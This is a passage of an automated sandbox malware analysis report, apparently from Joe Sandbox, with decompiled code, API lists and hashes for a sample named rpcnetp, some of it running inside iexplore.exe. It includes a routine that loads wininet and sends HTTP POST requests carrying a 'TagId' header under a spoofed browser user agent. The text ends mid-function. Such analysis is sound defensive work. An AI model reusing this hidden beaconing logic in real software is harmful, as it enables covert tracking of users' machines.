lstrcpyA.KERNEL32(?,TagId), ref: 72B22A65
lstrcpyA.KERNEL32(?,?), ref: 72B22A98

Strings

(, xrefs: 72B22A67
TagId, xrefs: 72B22A56

Memory Dump Source

Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd

Similarity

API ID: lstrcpy
String ID: ($TagId
API String ID: 3722407311-2515966560
Opcode ID: c628525553903b6a1cf8c10ac42aa78a7b08b5903878eebb30386322a8f7070c
Instruction ID: 937e6d634195ed91134bc96762776da25fbf2bc6e85c9379a4a0c7bdf025302a
Opcode Fuzzy Hash: c628525553903b6a1cf8c10ac42aa78a7b08b5903878eebb30386322a8f7070c
Instruction Fuzzy Hash: 0031EAB190074A9FEB21CFA9CD849EEB7F8FF49301F104529E56AF6550DB70AA00CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00A129E4, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 78
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00A129E4(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t53;
				signed int _t58;
				intOrPtr _t62;
				intOrPtr _t64;
				void* _t65;

				_push(0x40);
				_push(0xa153e8);
				E00A14A94(__ebx, __edi, __esi);
				_t64 =  *((intOrPtr*)(_t65 + 8));
				_t58 = 0;
				 *((intOrPtr*)(_t65 - 0x20)) = 0;
				_t62 = 0;
				 *(_t65 - 4) = 0;
				while(1) {
					_push(_t58);
					_push(_t58);
					_push(_t65 - 0x24);
					_push( *((intOrPtr*)(_t64 + 0x3c60)));
					if( *((intOrPtr*)(_t64 + 0x3c80))() == 0 ||  *((intOrPtr*)(_t65 - 0x24)) == _t58) {
						break;
					}
					_t53 =  *((intOrPtr*)(_t65 + 0x10)) - _t62;
					if(_t53 >  *((intOrPtr*)(_t65 - 0x24))) {
						_t53 =  *((intOrPtr*)(_t65 - 0x24));
					}
					_push(_t65 - 0x1c);
					_push(_t53);
					_push( *((intOrPtr*)(_t65 + 0xc)) + _t62);
					_push( *((intOrPtr*)(_t64 + 0x3c60)));
					if( *((intOrPtr*)(_t64 + 0x3c84))() != 0 &&  *((intOrPtr*)(_t65 - 0x1c)) != _t58) {
						_t62 = _t62 +  *((intOrPtr*)(_t65 - 0x1c));
						 *((intOrPtr*)(_t65 - 0x28)) = _t62;
						continue;
					}
					break;
				}
				 *((intOrPtr*)( *((intOrPtr*)(_t65 + 0x14)))) = _t62;
				if(_t62 != _t58) {
					lstrcpyA(_t65 - 0x50, "TagId");
					 *((intOrPtr*)(_t65 - 0x1c)) = 0x28;
					_push(0);
					_push(_t65 - 0x1c);
					_push(_t65 - 0x50);
					_push(0xffff);
					_push( *((intOrPtr*)(_t64 + 0x3c60)));
					if( *((intOrPtr*)(_t64 + 0x3c88))() != 0) {
						lstrcpyA(_t64 + 0x3cb0, _t65 - 0x50);
					}
					 *((intOrPtr*)(_t65 - 0x20)) = E00A12F96( *((intOrPtr*)(_t65 + 0xc)), _t62);
					_t58 = 0;
				}
				 *(_t65 - 4) =  *(_t65 - 4) | 0xffffffff;
				if( *((intOrPtr*)(_t65 - 0x20)) == _t58) {
					 *(_t64 + 0x5c) =  *(_t64 + 0x5c) & 0x000000fb;
					 *((intOrPtr*)( *((intOrPtr*)(_t65 + 0x14)))) = _t58;
				}
				return E00A1159C( *((intOrPtr*)(_t65 - 0x20)));
			}

0x00a129e4
0x00a129e6
0x00a129eb
0x00a129f0
0x00a129f3
0x00a129f5
0x00a129f8
0x00a129fa
0x00a129fd
0x00a129fd
0x00a129fe
0x00a12a02
0x00a12a03
0x00a12a11
0x00000000
0x00000000
0x00a12a1b
0x00a12a20
0x00a12a22
0x00a12a22
0x00a12a28
0x00a12a29
0x00a12a2f
0x00a12a30
0x00a12a3e
0x00a12a45
0x00a12a48
0x00000000
0x00a12a48
0x00000000
0x00a12a3e
0x00a12a50
0x00a12a54
0x00a12a65
0x00a12a67
0x00a12a6e
0x00a12a73
0x00a12a77
0x00a12a78
0x00a12a7d
0x00a12a8b
0x00a12a98
0x00a12a98
0x00a12aa3
0x00a12aa6
0x00a12aa6
0x00a12aa8
0x00a12ac5
0x00a12ac7
0x00a12ace
0x00a12ace
0x00a12ad8

APIs

lstrcpyA.KERNEL32(?,TagId), ref: 00A12A65
lstrcpyA.KERNEL32(?,?), ref: 00A12A98

Strings

(, xrefs: 00A12A67
TagId, xrefs: 00A12A56

Memory Dump Source

Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd

Similarity

API ID: lstrcpy
String ID: ($TagId
API String ID: 3722407311-2515966560
Opcode ID: e7c7d7a40c3976d90b9d9c98f2641f828e691ed448d21b143ad837a65f312a7b
Instruction ID: dddc32c03dc397f91921428a20a935034d069cde69a29059b6b10be023fa4b5d
Opcode Fuzzy Hash: e7c7d7a40c3976d90b9d9c98f2641f828e691ed448d21b143ad837a65f312a7b
Instruction Fuzzy Hash: 2131F671A0064AAFDF21CFA9CC85AEEB7F9FF48340F144529E565E6190DB70EA50CB20

Uniqueness

Uniqueness Score: -1.00%

Function 72B22EA1, Relevance: 6.1, APIs: 4, Instructions: 70
threadsynchronizationwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E72B22EA1(void* __ecx, intOrPtr _a4) {
				char _v8;
				signed char _t5;
				void* _t6;

				if( *0x72b260a8 == 0) {
					L5:
					__eflags =  *0x72b26088;
					if(__eflags != 0) {
						L10:
						_t6 = 0;
					} else {
						E72B237BE(_t5, __eflags, 0x72b2603c,  *0x72b260a0);
						__eflags =  *0x72b2605f;
						if( *0x72b2605f == 0) {
							 *0x72b260b8 = 0;
						}
						__eflags =  *0x72b260b8;
						if( *0x72b260b8 != 0) {
							L12:
							 *0x72b26030 = 0x72b2603c;
							_t6 = CreateThread(0, 0, E72B23132, 0, 0, 0x72b26148);
							 *0x72b260a8 = _t6;
						} else {
							 *0x72b26034 =  *0x72b26034 + 1;
							__eflags =  *0x72b26034 - _a4;
							if(__eflags < 0) {
								 *((char*)( *0x72b260a0)) = 0;
								E72B237BE( *0x72b260a0, __eflags, 0x72b2603c,  *0x72b260a0);
								 *0x72b2605f = 1;
								 *0x72b260b8 = 1;
								goto L12;
							} else {
								goto L10;
							}
						}
					}
				} else {
					PostThreadMessageA( *0x72b26148, 0x12, 0, 0);
					WaitForSingleObject( *0x72b260a8, 0x7530);
					CloseHandle( *0x72b260a8);
					 *0x72b260a8 = 0;
					_t5 =  *((intOrPtr*)(E72B23C14(0x1e, 0,  &_v8)));
					if( *0x72b2602c != 0 ||  *0x72b260b8 != 0) {
						if((_t5 & 0x00000004) == 0) {
							goto L5;
						} else {
							_t6 = 0;
						}
					} else {
						goto L5;
					}
				}
				return _t6;
			}

0x72b22eae
0x72b22f0c
0x72b22f0d
0x72b22f13
0x72b22f4c
0x72b22f4c
0x72b22f15
0x72b22f21
0x72b22f26
0x72b22f2c
0x72b22f2e
0x72b22f2e
0x72b22f34
0x72b22f3a
0x72b22f71
0x72b22f7f
0x72b22f85
0x72b22f8b
0x72b22f3c
0x72b22f3c
0x72b22f47
0x72b22f4a
0x72b22f55
0x72b22f5e
0x72b22f63
0x72b22f6a
0x00000000
0x00000000
0x00000000
0x00000000
0x72b22f4a
0x72b22f3a
0x72b22eb0
0x72b22eba
0x72b22ecb
0x72b22ed7
0x72b22ee4
0x72b22eef
0x72b22ef7
0x72b22f03
0x00000000
0x72b22f05
0x72b22f05
0x72b22f05
0x00000000
0x00000000
0x00000000
0x72b22ef7
0x72b22f93

APIs

PostThreadMessageA.USER32 ref: 72B22EBA
WaitForSingleObject.KERNEL32(00007530), ref: 72B22ECB
CloseHandle.KERNEL32 ref: 72B22ED7
CreateThread.KERNEL32(00000000,00000000,72B23132,00000000,00000000,72B26148), ref: 72B22F85

Memory Dump Source

Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd

Similarity

API ID: Thread$CloseCreateHandleMessageObjectPostSingleWait
String ID:
API String ID: 3204264564-0
Opcode ID: 5c150527a3dcd8632fa4d2c8eb45422c0a244393909aa92e597cd2ea823468ca
Instruction ID: 55e1e3665506082e23fab281f5e934d135a5a335b73c88e28fd5a4c76e9a1134
Opcode Fuzzy Hash: 5c150527a3dcd8632fa4d2c8eb45422c0a244393909aa92e597cd2ea823468ca
Instruction Fuzzy Hash: 5021A7724853C4BFEB22D726C8C0B473FE9E70D2C6722081CE54AC7117D3210899E755

Uniqueness

Uniqueness Score: -1.00%

Function 00A12EA1, Relevance: 6.1, APIs: 4, Instructions: 70
threadsynchronizationwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A12EA1(void* __ecx, intOrPtr _a4) {
				char _v8;
				signed char _t5;
				void* _t6;

				if( *0xa160a8 == 0) {
					L5:
					__eflags =  *0xa16088;
					if(__eflags != 0) {
						L10:
						_t6 = 0;
					} else {
						E00A137BE(_t5, __eflags, 0xa1603c,  *0xa160a0);
						__eflags =  *0xa1605f;
						if( *0xa1605f == 0) {
							 *0xa160b8 = 0;
						}
						__eflags =  *0xa160b8;
						if( *0xa160b8 != 0) {
							L12:
							 *0xa16030 = 0xa1603c;
							_t6 = CreateThread(0, 0, E00A13132, 0, 0, 0xa16148);
							 *0xa160a8 = _t6;
						} else {
							 *0xa16034 =  *0xa16034 + 1;
							__eflags =  *0xa16034 - _a4;
							if(__eflags < 0) {
								 *((char*)( *0xa160a0)) = 0;
								E00A137BE( *0xa160a0, __eflags, 0xa1603c,  *0xa160a0);
								 *0xa1605f = 1;
								 *0xa160b8 = 1;
								goto L12;
							} else {
								goto L10;
							}
						}
					}
				} else {
					PostThreadMessageA( *0xa16148, 0x12, 0, 0);
					WaitForSingleObject( *0xa160a8, 0x7530);
					CloseHandle( *0xa160a8);
					 *0xa160a8 = 0;
					_t5 =  *((intOrPtr*)(E00A13C14(0x1e, 0,  &_v8)));
					if( *0xa1602c != 0 ||  *0xa160b8 != 0) {
						if((_t5 & 0x00000004) == 0) {
							goto L5;
						} else {
							_t6 = 0;
						}
					} else {
						goto L5;
					}
				}
				return _t6;
			}

0x00a12eae
0x00a12f0c
0x00a12f0d
0x00a12f13
0x00a12f4c
0x00a12f4c
0x00a12f15
0x00a12f21
0x00a12f26
0x00a12f2c
0x00a12f2e
0x00a12f2e
0x00a12f34
0x00a12f3a
0x00a12f71
0x00a12f7f
0x00a12f85
0x00a12f8b
0x00a12f3c
0x00a12f3c
0x00a12f47
0x00a12f4a
0x00a12f55
0x00a12f5e
0x00a12f63
0x00a12f6a
0x00000000
0x00000000
0x00000000
0x00000000
0x00a12f4a
0x00a12f3a
0x00a12eb0
0x00a12eba
0x00a12ecb
0x00a12ed7
0x00a12ee4
0x00a12eef
0x00a12ef7
0x00a12f03
0x00000000
0x00a12f05
0x00a12f05
0x00a12f05
0x00000000
0x00000000
0x00000000
0x00a12ef7
0x00a12f93

APIs

PostThreadMessageA.USER32 ref: 00A12EBA
WaitForSingleObject.KERNEL32(00007530), ref: 00A12ECB
CloseHandle.KERNEL32 ref: 00A12ED7
CreateThread.KERNEL32(00000000,00000000,00A13132,00000000,00000000,00A16148), ref: 00A12F85

Memory Dump Source

Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd

Similarity

API ID: Thread$CloseCreateHandleMessageObjectPostSingleWait
String ID:
API String ID: 3204264564-0
Opcode ID: d2e71c7b4b0023461e103ccdaf62b3af7fbed5a53af77e0bc65cb1954733cb51
Instruction ID: d09e5ba222ce55b01dae2f5128c9ac96e5cded5fe215e3e7a2abb97474652b9d
Opcode Fuzzy Hash: d2e71c7b4b0023461e103ccdaf62b3af7fbed5a53af77e0bc65cb1954733cb51
Instruction Fuzzy Hash: B2219F79445284BEEF11DBE0BD80AD63F7AA71D384B09C069F545C6132C3618EEBDB24

Uniqueness

Uniqueness Score: -1.00%

Function 72B21F30, Relevance: 6.0, APIs: 4, Instructions: 31
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E72B21F30(void* _a4, intOrPtr _a8) {
				void* _t6;
				void* _t8;
				void* _t14;

				_t14 = _a4;
				if(_t14 != 0) {
					_t16 = _a8;
					if(_a8 != 0) {
						E72B21DE6(_t14, 0x7fffffff);
					}
					E72B21E58(_t16, _t14);
					_t8 =  *(_t14 + 0x3ba4);
					if(_t8 != 0) {
						if(WaitForSingleObject(_t8, 0x1388) == 0x102) {
							TerminateThread( *(_t14 + 0x3ba4), 0);
						}
						CloseHandle( *(_t14 + 0x3ba4));
					}
					return LocalFree(_t14);
				}
				return _t6;
			}

0x72b21f34
0x72b21f39
0x72b21f3b
0x72b21f3f
0x72b21f47
0x72b21f47
0x72b21f4d
0x72b21f52
0x72b21f5a
0x72b21f6d
0x72b21f77
0x72b21f77
0x72b21f83
0x72b21f83
0x00000000
0x72b21f8a
0x72b21f92

APIs

WaitForSingleObject.KERNEL32(?,00001388), ref: 72B21F62
TerminateThread.KERNEL32(?,00000000), ref: 72B21F77
CloseHandle.KERNEL32(?), ref: 72B21F83
LocalFree.KERNEL32(?), ref: 72B21F8A

Part of subcall function 72B21DE6: GetMessageA.USER32 ref: 72B21E0C
Part of subcall function 72B21DE6: TranslateMessage.USER32(?), ref: 72B21E33
Part of subcall function 72B21DE6: DispatchMessageA.USER32 ref: 72B21E3D

Memory Dump Source

Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd

Similarity

API ID: Message$CloseDispatchFreeHandleLocalObjectSingleTerminateThreadTranslateWait
String ID:
API String ID: 2048180657-0
Opcode ID: 96f95f19e928b8abd5f893f00144e223d4d97deb48a41187eccbe0a9266068be
Instruction ID: 30d08b297c30fda9417a0af8e49c41b064fc214c9d90f03f7e5885ec2cf4e8c1
Opcode Fuzzy Hash: 96f95f19e928b8abd5f893f00144e223d4d97deb48a41187eccbe0a9266068be
Instruction Fuzzy Hash: 4AF0B432161B10ABC7216A26CC08BCB76ECDF81796F111514F62AA6183C77455408B95

Uniqueness

Uniqueness Score: -1.00%

Function 00A11F30, Relevance: 6.0, APIs: 4, Instructions: 31
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A11F30(void* _a4, intOrPtr _a8) {
				void* _t6;
				void* _t8;
				void* _t14;

				_t14 = _a4;
				if(_t14 != 0) {
					_t16 = _a8;
					if(_a8 != 0) {
						E00A11DE6(_t14, 0x7fffffff);
					}
					E00A11E58(_t16, _t14);
					_t8 =  *(_t14 + 0x3ba4);
					if(_t8 != 0) {
						if(WaitForSingleObject(_t8, 0x1388) == 0x102) {
							TerminateThread( *(_t14 + 0x3ba4), 0);
						}
						CloseHandle( *(_t14 + 0x3ba4));
					}
					return LocalFree(_t14);
				}
				return _t6;
			}

0x00a11f34
0x00a11f39
0x00a11f3b
0x00a11f3f
0x00a11f47
0x00a11f47
0x00a11f4d
0x00a11f52
0x00a11f5a
0x00a11f6d
0x00a11f77
0x00a11f77
0x00a11f83
0x00a11f83
0x00000000
0x00a11f8a
0x00a11f92

APIs

WaitForSingleObject.KERNEL32(?,00001388), ref: 00A11F62
TerminateThread.KERNEL32(?,00000000), ref: 00A11F77
CloseHandle.KERNEL32(?), ref: 00A11F83
LocalFree.KERNEL32(?), ref: 00A11F8A

Part of subcall function 00A11DE6: GetMessageA.USER32 ref: 00A11E0C
Part of subcall function 00A11DE6: TranslateMessage.USER32(?), ref: 00A11E33
Part of subcall function 00A11DE6: DispatchMessageA.USER32 ref: 00A11E3D

Memory Dump Source

Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd

Similarity

API ID: Message$CloseDispatchFreeHandleLocalObjectSingleTerminateThreadTranslateWait
String ID:
API String ID: 2048180657-0
Opcode ID: 7b0c150b1f452b4bb1c34c94d097e3efb055df7c1b2296ae374339834d757f28
Instruction ID: 1c6aae05f1b48377124d60e0d9273015154b1b0493f446c0291fcd4c3bba5dad
Opcode Fuzzy Hash: 7b0c150b1f452b4bb1c34c94d097e3efb055df7c1b2296ae374339834d757f28
Instruction Fuzzy Hash: FCF02731A02A10AFC7216BA1DC09FCE779CEF05711F004116F715E9190CB709AC2CB91

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: iexplore.exe PID: 7148 Parent PID: 7116 iexplore.exeCOMMON

Execution Graph

Execution Coverage

Dynamic/Packed Code Coverage

Signature Coverage

Execution Coverage:	18.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	496
Total number of Limit Nodes:	15

Executed Functions

Function 72B22D7F, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 113
librarynetworkloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E72B22D7F(void** _a4, char* _a8, char* _a12, intOrPtr _a16) {
				char _v8;
				char _v12;
				char _v44;
				signed int _t31;
				_Unknown_base(*)()* _t33;
				signed int _t35;
				void* _t36;
				char* _t37;
				signed int _t44;
				void* _t52;
				void** _t55;

				_v8 = 0x4e20;
				_v12 = 0x493e0;
				_t31 = LoadLibraryA("wininet.dll"); // executed
				_t55 = _a4;
				_t55[0xd] = _t31;
				if(_t31 != 0) {
					_t5 =  &(_t55[3]); // 0x493ec
					_a4 = _t5;
					_t52 = 0;
					while(1) {
						_t7 = _t52 + 0x72b21574; // 0x72b21324
						_t33 = GetProcAddress(_t55[0xd],  *_t7);
						 *_a4 = _t33;
						if(_t33 == 0) {
							break;
						}
						_a4 =  &(_a4[1]);
						_t52 = _t52 + 4;
						if(_t52 < 0x28) {
							continue;
						}
						_t36 = InternetOpenA("Mozilla/4.0 (compatible; MSIE 7.0;)", 0, 0, 0, 0);
						 *_t55 = _t36;
						if(_t36 == 0) {
							L12:
							_t35 = _t36 | 0xffffffff;
							L14:
							return _t35;
						}
						if(_a16 != 0) {
							_t37 = _a12;
							_push( *_t37);
							L72B22946();
						} else {
							_t37 = _a8;
						}
						_t36 = InternetConnectA( *_t55, _t37, 0x50, 0x72b211c4, 0x72b211c4, 3, 0, 0);
						_t55[1] = _t36;
						if(_t36 != 0) {
							_t36 = _t55[9](_t36, "POST", 0x72b211c4, 0, 0, 0, 0x84400100, 0);
							_t55[2] = _t36;
							if(_t36 != 0) {
								_t55[5](_t36, 2,  &_v8, 4);
								_t55[5](_t55[2], 5,  &_v12, 4);
								wsprintfA( &_v44, "%s: 0\r\n", "TagId");
								_t44 = _t55[7](_t55[2],  &_v44, 0xffffffff, 0, 0);
								asm("sbb eax, eax");
								_t35 = ( ~_t44 & 0x00000002) - 1;
								goto L14;
							}
						}
						goto L12;
					}
					FreeLibrary(_t55[0xd]);
					_t55[0xd] = 0;
					_t35 = 0;
					goto L14;
				}
				return _t31 | 0xffffffff;
			}

APIs

LoadLibraryA.KERNEL32(wininet.dll,?,00000080,?,00000004,-00000004,00000000,?,00000000,00000080), ref: 72B22D9A
GetProcAddress.KERNEL32(?,72B21324), ref: 72B22DC6
InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 7.0;),00000000,00000000,00000000,00000000,?,00000080,?,00000004,-00000004,00000000,?,00000000,00000080), ref: 72B22DEA
InternetConnectA.WININET(000493E0,00000000,00000050,72B211C4,72B211C4,00000003,00000000,00000000,00000080,?,00000080,?,00000004,-00000004,00000000,?), ref: 72B22E2A

Strings

Mozilla/4.0 (compatible; MSIE 7.0;), xrefs: 72B22DE5
%s: 0, xrefs: 72B22E75
POST, xrefs: 72B22E3E
N, xrefs: 72B22D8C
TagId, xrefs: 72B22E6D
wininet.dll, xrefs: 72B22D87

Memory Dump Source

Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd

Similarity

API ID: Internet$AddressConnectLibraryLoadOpenProc
String ID: N$%s: 0$Mozilla/4.0 (compatible; MSIE 7.0;)$POST$TagId$wininet.dll
API String ID: 2199918435-1135021940
Opcode ID: c91c1c860592b3f528578ac02ed5a4cb714e6664f223f3aca85c5e4039d8444c
Instruction ID: a2a5ce718f49d85c2f3b8665ac83783b69dbef2134b55f7e38b1c01db8571e2a
Opcode Fuzzy Hash: c91c1c860592b3f528578ac02ed5a4cb714e6664f223f3aca85c5e4039d8444c
Instruction Fuzzy Hash: 9B31C2B1500308BFEB21AF64CD89E5B7BFDFF48396B104929F65AD6590D330A854CB20

Uniqueness

Uniqueness Score: -1.00%

Function 72B232DE, Relevance: 18.1, APIs: 12, Instructions: 107
synchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E72B232DE() {
				void* _v8;
				void* _v12;
				long _v16;
				long _t11;
				signed int _t14;
				void* _t18;
				void* _t20;
				intOrPtr _t26;
				intOrPtr _t29;
				signed int _t30;
				int _t33;
				void* _t34;
				void* _t35;
				void* _t36;
				void* _t38;
				void* _t42;

				_t11 = GetVersion();
				_t33 = 0;
				 *0x72b260b0 = _t11;
				_t42 =  *0x72b2608c - _t33; // 0x1
				if(_t42 == 0 && _t11 < 0) {
					 *0x72b26038 =  *0x72b26038 | 0xffffffff;
				}
				_v8 = GetStdHandle(0xfffffff4);
				_t38 = E72B23420(_t12);
				if(_t38 == _t33) {
					L11:
					_t14 =  *0x72b26038; // 0x1
					__eflags = _t14 - _t33;
					if(_t14 != _t33) {
						__eflags = _t14 - 2;
						if(_t14 == 2) {
							goto L23;
						}
						__eflags = _t38 - _t33;
						if(_t38 != _t33) {
							L17:
							 *0x72b260ac = CreateEventA(_t33, _t33, _t33, _t33);
							L18:
							_t18 = CreateThread(_t33, _t33, E72B23161, _t33, _t33,  &_v16); // executed
							_v12 = _t18;
							__eflags = _t18 - _t33;
							if(_t18 != _t33) {
								_t20 =  *0x72b260ac; // 0x1b0
								__eflags = _t20 - _t33;
								if(_t20 != _t33) {
									WaitForSingleObject(_t20, 0xffffffff);
									CloseHandle( *0x72b260ac);
									 *0x72b260ac = _t33;
								}
								WaitForSingleObject(_v12, 0xffffffff);
								CloseHandle(_v12);
							}
							E72B22FBB(_t35, _t33);
							goto L23;
						}
						__eflags = _t14 - 0xffffffff;
						if(_t14 != 0xffffffff) {
							goto L18;
						}
						goto L17;
					}
					__eflags = _t38 - _t33;
					if(_t38 != _t33) {
						goto L17;
					}
					E72B21EDA();
					goto L23;
				} else {
					_t26 =  *0x72b26008; // 0x72b27204
					 *0x72b26004 = _t33;
					_t46 =  *((intOrPtr*)(_t26 + 0x28)) - _t33;
					if( *((intOrPtr*)(_t26 + 0x28)) != _t33) {
						 *0x72b26038 = 1;
						SetStdHandle(0xfffffff6, _v8);
						goto L11;
					}
					 *0x72b26038 = 2;
					_t34 = E72B22123(_t33, _t36, CloseHandle, _t38, _t46);
					_t29 =  *0x72b26008; // 0x72b27204
					 *(_t29 + 0x28) = 1;
					_t30 = E72B22ADB(_t34, _t35, _t36, CloseHandle, _t38, _t46, _t34);
					asm("sbb esi, esi");
					_t38 =  ~_t30 + 1;
					if(_t34 != 0) {
						CloseHandle(_t34);
					}
					if(_t38 != 0) {
						_t33 = 0;
						__eflags = 0;
						goto L11;
					} else {
						E72B22FBB(_t35, _t38);
						_t33 = 0;
						L23:
						if(_v8 != _t33) {
							CloseHandle(_v8);
						}
						ExitProcess(_t33);
					}
				}
			}

0x72b232e7
0x72b232ed
0x72b232ef
0x72b232f4
0x72b232fa
0x72b23300
0x72b23300
0x72b23310
0x72b2331e
0x72b23322
0x72b2338f
0x72b2338f
0x72b23394
0x72b23396
0x72b233a3
0x72b233a6
0x00000000
0x00000000
0x72b233a8
0x72b233aa
0x72b233b1
0x72b233bb
0x72b233c0
0x72b233cd
0x72b233d3
0x72b233d6
0x72b233d8
0x72b233da
0x72b233e5
0x72b233e7
0x72b233ec
0x72b233f4
0x72b233f6
0x72b233f6
0x72b23401
0x72b23406
0x72b23406
0x72b23409
0x00000000
0x72b23409
0x72b233ac
0x72b233af
0x00000000
0x00000000
0x00000000
0x72b233af
0x72b23398
0x72b2339a
0x00000000
0x00000000
0x72b2339c
0x00000000
0x72b23324
0x72b23324
0x72b23329
0x72b2332f
0x72b23332
0x72b23379
0x72b23385
0x00000000
0x72b23385
0x72b23334
0x72b23343
0x72b23345
0x72b2334b
0x72b23352
0x72b2335b
0x72b2335d
0x72b23360
0x72b23363
0x72b23363
0x72b23367
0x72b2338d
0x72b2338d
0x00000000
0x72b23369
0x72b2336a
0x72b2336f
0x72b2340e
0x72b23411
0x72b23416
0x72b23416
0x72b23419
0x72b23419
0x72b23367

APIs

GetVersion.KERNEL32 ref: 72B232E7
GetStdHandle.KERNEL32(000000F4), ref: 72B23309
CloseHandle.KERNEL32(00000000), ref: 72B23363
SetStdHandle.KERNEL32(000000F6,?,00000000), ref: 72B23385
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 72B233B5
CreateThread.KERNEL32(00000000,00000000,Function_00003161,00000000,00000000,?), ref: 72B233CD
WaitForSingleObject.KERNEL32(000001B0,000000FF), ref: 72B233EC
CloseHandle.KERNEL32 ref: 72B233F4
WaitForSingleObject.KERNEL32(?,000000FF), ref: 72B23401
CloseHandle.KERNEL32(?), ref: 72B23406
CloseHandle.KERNEL32(?,00000000), ref: 72B23416
ExitProcess.KERNEL32 ref: 72B23419

Memory Dump Source

Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd

Similarity

API ID: Handle$Close$CreateObjectSingleWait$EventExitProcessThreadVersion
String ID:
API String ID: 2472693224-0
Opcode ID: e6fc5641f30b28ea52a77f4172d85290c361ad5936020697f046fc1cd2347553
Instruction ID: 016aedef878e6635e219e695dc34082c73d5b5be0daf8870531cd6c57efd487a
Opcode Fuzzy Hash: e6fc5641f30b28ea52a77f4172d85290c361ad5936020697f046fc1cd2347553
Instruction Fuzzy Hash: 3A310072440314EFCB216F6ACDC4A4B3EF8DB443E67224A2DE51AE3152D7304D89DB54

Uniqueness

Uniqueness Score: -1.00%

Function 72B2351D, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 95
timewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E72B2351D(void* __edx, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				struct tagMSG _v32;
				void* __edi;
				void* __esi;
				int _t13;
				int _t16;
				long _t17;
				void* _t18;
				int _t19;
				void* _t20;
				void* _t23;
				int _t26;
				_Unknown_base(*)()* _t31;
				void* _t34;
				void* _t35;
				struct HWND__* _t37;

				_t35 = __edx;
				_t37 = _a4;
				_t13 = _a8;
				_t31 = 0;
				if(_t13 == 0) {
					L17:
					KillTimer(_t37, 0x64);
					do {
						_t16 = PeekMessageA( &_v32, _t37, 0x113, 0x113, 1);
						__eflags = _t16;
					} while (_t16 != 0);
					PostQuitMessage(_t31);
					__eflags = _a8 - 0x11;
					if(_a8 != 0x11) {
						L12:
